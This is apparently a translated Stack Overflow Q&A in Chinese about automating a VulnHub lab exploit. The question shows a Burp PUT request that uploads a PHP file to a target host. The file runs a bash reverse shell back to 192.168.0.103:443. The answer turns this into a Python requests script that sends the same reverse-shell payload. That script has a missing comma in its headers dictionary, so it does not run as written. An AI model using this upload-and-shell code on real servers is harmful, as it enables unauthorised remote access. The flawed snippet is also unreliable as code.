使用 python 发送请求与在 Burp 套件中相同

Question

被利用的 vulnhub 虚拟机现在想要自动化利用过程。我有 burp suite 请求，它给了我反向 shell，如何使用 python 的请求库发送完全相同的请求？

PUT /test/revshell.php HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 75



<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.103/443 0>&1'");

Answer 1

我建议这样做：

import requests

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close"
    "Upgrade-Insecure-Requests": "1",
}

data = """<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.103/443 0>&1'");
"""
requests.put("http://192.168.0.105/test/revshell.php", headers=headers, data=data)

希望对您有所帮助！

使用 python 发送请求与在 Burp 套件中相同

send requests with python same as in Burp suite

python

python-requests

burp